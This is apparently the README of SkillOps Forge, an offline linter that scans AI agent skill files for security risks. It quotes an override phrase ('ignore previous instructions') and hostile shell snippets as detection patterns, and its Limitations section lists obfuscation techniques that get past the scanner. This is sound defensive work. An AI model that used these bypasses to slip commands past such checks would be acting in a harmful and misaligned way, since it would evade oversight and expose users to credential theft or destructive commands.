SkillOps Forge

English · 中文

Static lint + risk-hint auditor for AI Agent skill packs. Offline CLI for SKILL.md, CLAUDE.md, and .cursor/rules/*.mdc — 19 plaintext-pattern security rules + 27 audit rules, zero LLM, zero subprocess.

Why another tool?

The skill ecosystem already has structural linters and quality scorers. None of them treat AI-era attack surfaces — agent memory exfiltration, identity-file reads, prompt-injection keywords, hidden zero-width payloads — as first-class detections.

Tool	Form	Focus	Security rules	Offline	LLM-era checks
`skilllint`	CLI	structural lint, cross-platform	partial (pattern-level)	✓	✗
`skill-tester`	CLI	AST + sample exec + quality scoring	✗	✓	✗
`skillcheck`	CLI	frontmatter-only validator	✗	✓	✗
`claude-skill-check`	GH Action	secrets in skill body	7 secret patterns	✓	✗
`kevinsong0/skills-vetter`	Prompt skill	LLM-driven vetting	qualitative	✗ (needs LLM)	partial
`skillops-forge`	CLI + GH Action	lint + plaintext-pattern security hint + score + report	19 plaintext rules	✓	✓

SkillOps Forge ships dedicated rules for agent-private files (MEMORY.md, USER.md, SOUL.md, IDENTITY.md, ~/.workbuddy/memory), combined with an auditor, a deterministic scorer, a CRITICAL-veto policy, and self-contained HTML/Markdown/JSON reports.

Disclaimer. Risk-assistance only. A passing score reduces obvious failure modes; it does not certify safety. Read the Limitations section below before relying on this tool as a security gate.

Limitations

SkillOps Forge is a plaintext-pattern static linter, not a full security solution. We were tested under adversarial conditions — here is what it can and cannot do, in plain terms:

What it does well

Catches plaintext occurrences of the 19 documented patterns (curl | sh, sudo, eval(, ~/.ssh/id_rsa, MEMORY.md references, etc.) when the attacker writes them in the canonical, unobfuscated form.
Surfaces structural and naming issues in skill packs (frontmatter schema, kebab-case names, token budgets, missing trigger phrases).
Generates deterministic, machine-readable reports that are stable enough to use as PR-blocking CI gates for honest authors.

What it does not do — bypass scenarios we verified

The following techniques defeat SkillOps Forge today:

Bypass	What slips through
Unicode confusables (`ѕudo` with Cyrillic `ѕ` U+0455)	SEC-006 misses; only SEC-005 may catch the trailing `rm`
`bash -c "$(curl …)"` instead of `curl … \| sh`	SEC-001 misses; only SEC-010 medium domain hint fires
`curl -o /tmp/x && sh /tmp/x` (download-then-execute)	SEC-001 misses
`python -c "exec(urlopen(...).read())"`	SEC-001 misses
`__import__("builtins").exec(payload)`	SEC-014 misses; SEC-018 catches it
`getattr(__builtins__, 'ev'+'al')(payload)`	SEC-014 misses; SEC-018 + SEC-019 catch it
Base64-encoded payload split across two strings	SEC-008 / SEC-013 miss unless one half is long-enough alone

The fundamental constraint: regex-based plaintext scanning cannot read intent. Determined attackers can always reach an obfuscation layer that defeats finite pattern sets. SEC-018 and SEC-019 (added in 0.2.1) close the two most common reflection / string-concat bypasses, but the list is not exhaustive and never will be.

Out of scope

AGENTS.md / Codex agents.json files — not parsed.
Python AST / runtime sample execution — not implemented (red line: no subprocess, no LLM, no untrusted code execution).
Network reputation lookup of domains in skill bodies — fully offline.
Cryptographic signature verification of skill packs — not implemented.

We will keep growing the bypass coverage in future releases and explicitly list each new defense + each known limitation in CHANGELOG.md.

Quick Start (30 seconds)

# from source (until PyPI release)
pip install -e ".[dev]"

# verify install
skillops --help          # 5 commands: scan / init-ci / version / rules / rule
skillops version         # skillops-forge 0.2.1

# scan a skill (or a whole skill repo)
skillops scan ./my-skill --report all

# bootstrap a CI workflow that fails the PR if score drops below 70
skillops init-ci --github-actions

Reports land in ./reports/ by default:

File	Purpose
`reports/skillops-report.html`	Self-contained HTML (drop into a README, share as artifact)
`reports/skillops-report.md`	Markdown summary (PR comment friendly)
`reports/skillops-result.json`	Machine-readable, schema-stable (CI artifact)

CLI

skillops scan PATH [--report md|html|json|all] [--out-dir DIR]
                   [--threshold 70] [--no-cursor-rules] [--no-runner] [-v]
skillops init-ci [--github-actions / --no-github-actions]
                 [--out FILE] [--force]
skillops version

Exit codes:

Code	Meaning
0	Pass (score ≥ threshold AND zero CRITICAL findings)
1	Audit failed (below threshold or any CRITICAL finding)
2	User error (bad path, bad arguments)
3	Internal error (rare; malformed YAML now degrades to a finding)

What gets checked

19 security rules (SEC-001 → SEC-019)

ID	Severity	Detection
SEC-001	critical	Remote script piped to shell (`curl … \| sh`)
SEC-002	high	Download-then-execute (`wget -O … && bash`)
SEC-003	critical	Sensitive credential file path (`~/.ssh`, `~/.aws`, `id_rsa`, `.netrc`)
SEC-004	high	Implicit credential env-var read (`AWS_*`, `OPENAI_API_KEY`, `GITHUB_TOKEN`)
SEC-005	critical	Destructive shell command (`rm -rf /`, `dd if=`, `mkfs`, fork bomb)
SEC-006	high	Privilege escalation (`sudo`, `chmod 777`, `chown -R root`)
SEC-007	high	Hidden zero-width characters (U+200B/200C/200D/FEFF)
SEC-008	medium	Long base64 / high-entropy blob (heuristic)
SEC-009	high	Prompt-injection keyword (`ignore previous instructions`, `jailbreak`)
SEC-010	medium	Exfiltration to non-allowlisted domain
SEC-011	high	Shell injection via unsanitized variable
SEC-012	critical	Agent identity / memory file access (`MEMORY.md`, `USER.md`, `SOUL.md`, `IDENTITY.md`, `CLAUDE.md`, `~/.workbuddy/memory`)
SEC-013	high	Base64 / hex decode action (`base64 -d`, `atob(`, `fromCharCode`)
SEC-014	high	Dynamic execution (`eval(`, `exec(`, `Function(...)`)
SEC-015	high	Network call to a raw IPv4 address
SEC-016	critical	Browser cookie / Login Data / saved-credential access
SEC-017	high	Writes to system / privileged paths (`/etc`, `/usr`, `C:\Windows`)
SEC-018	high	Reflective dynamic execution (`getattr(__builtins__, ...)`, `__import__("builtins").exec`)
SEC-019	high	String-concatenated `eval` / `exec` / `compile` name (e.g. `'ev'+'al'`)

Structural audit (auditor)

frontmatter (required + recommended fields), description (length + trigger phrasing), permissions (declared allowed-tools vs. detected shell usage), io_schema (Inputs / Outputs sections), examples (≥1 fenced block, runnable).

Runner

Examples are interpreted, never executed. The runner uses shlex plus a strict allow / deny list, and the test suite asserts subprocess.run, Popen, check_call, and check_output are never invoked.

Reports

Each report includes (since 0.1.2):

Score / Risk / Threshold / Result — with a ⚠️ PASSED WITH CAUTION middle state when score ≥ threshold but a HIGH finding exists.
Recommended Action — risk-tier-mapped guidance (e.g. CRITICAL → “DO NOT INSTALL. Address all critical findings first.”).
Permissions Summary — auto-extracted Files Read / Files Write / Commands / Network from the skill body and examples.
Inventory / Findings / Examples Dry-Run / Compliance Checklist.

Scoring

score = max(0, 100 - Σ(weight × count))
weights: critical=25, high=12, medium=5, low=2, info=0

A single CRITICAL finding sets is_passed = false regardless of score (one-vote veto). The CRITICAL veto applies to both audit_findings and security_findings; is_passed is a Pydantic v2 @computed_field so JSON, Markdown and HTML reports stay in sync automatically.

CI in one line

skillops init-ci --github-actions

Generates .github/workflows/skillops.yml with pinned actions/checkout@v4 and actions/setup-python@v5, an artifact upload, and a fail-under threshold (default 70). Default policy refuses to overwrite an existing workflow; pass --force to replace it.

Real-world example

Running SkillOps Forge against 37 skills installed on a developer machine (~/.workbuddy/skills/) surfaced two true-positive CRITICAL findings:

Skill	Finding	Evidence
`proactive-agent`	SEC-012 × 2	`Read SOUL.md` / `Read USER.md` (lines 499–500)
`humanizer`	AUD-000 (CRITICAL)	Multi-line YAML description without quoting (parser degrades gracefully instead of crashing)

The full distribution: 2 critical · 1 high · 3 medium · 9 low · 22 info. See CHANGELOG.md (entries [0.1.2], [0.1.4], [0.2.0], [0.2.1]) for the rule-by-rule rationale and the prior-art credits to skilllint and skillcheck.

Design red lines

Never subprocess — the runner has zero subprocess import; tests monkey-patch and assert non-invocation.
Fully offline — no network calls (not even GitHub API); init-ci only writes a template file.
Never upload user content — every byte of analysis stays local.
Never execute risky commands — examples are interpreted via shlex plus an allow / deny list; curl … | sh is intercepted.
Risk-assistance, not certification — explicit disclaimer in every report.

Project layout

skillops-forge/
├── src/skillops_forge/
│   ├── parser/        # SKILL.md / CLAUDE.md / .cursor/rules
│   ├── auditor/       # frontmatter / description / permissions / io / examples
│   ├── scanner/       # rule loader + dedup engine
│   ├── runner/        # shlex-based dry-run, never subprocess
│   ├── reporter/      # md / html / json + scoring
│   ├── pipeline.py    # parser → audit → scan → run → score → report
│   ├── plugins/       # PluginProtocol (P1: LLM judge, cross-format export)
│   ├── rules/         # YAML data-driven SEC rules
│   ├── templates/     # Jinja2 (HTML/MD reports + GH Actions yaml)
│   └── ci/            # init-ci generator
├── tests/             # 206 tests, 91% line coverage (scanner ≥95%)
├── docs/              # architecture, rules, JSON schema, mermaid diagrams
└── pyproject.toml

License

MIT · 中文版见 README_CN.md.

Name		Name	Last commit message	Last commit date
Latest commit History 5 Commits
.github/workflows		.github/workflows
docs		docs
scripts		scripts
src/skillops_forge		src/skillops_forge
tests		tests
.gitattributes		.gitattributes
.gitignore		.gitignore
CHANGELOG.md		CHANGELOG.md
LICENSE		LICENSE
README.md		README.md
README_CN.md		README_CN.md
pyproject.toml		pyproject.toml

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

SkillOps Forge

Why another tool?

Limitations

What it does well

What it does not do — bypass scenarios we verified

Recommended posture

Out of scope

Quick Start (30 seconds)

CLI

What gets checked

19 security rules (SEC-001 → SEC-019)

Structural audit (auditor)

Runner

Reports

Scoring

CI in one line

Real-world example

Design red lines

Project layout

License

About

Uh oh!

Releases

Packages

Uh oh!

Contributors

Uh oh!

Languages

Folders and files

Latest commit

History

Repository files navigation

SkillOps Forge

Why another tool?

Limitations

What it does well

What it does not do — bypass scenarios we verified

Recommended posture

Out of scope

Quick Start (30 seconds)

CLI

What gets checked

19 security rules (SEC-001 → SEC-019)

Structural audit (auditor)

Runner

Reports

Scoring

CI in one line

Real-world example

Design red lines

Project layout

License

About

Topics

Resources

License

Uh oh!

Stars

Watchers

Forks

Releases

Packages 0

Uh oh!

Contributors

Uh oh!

Languages

Packages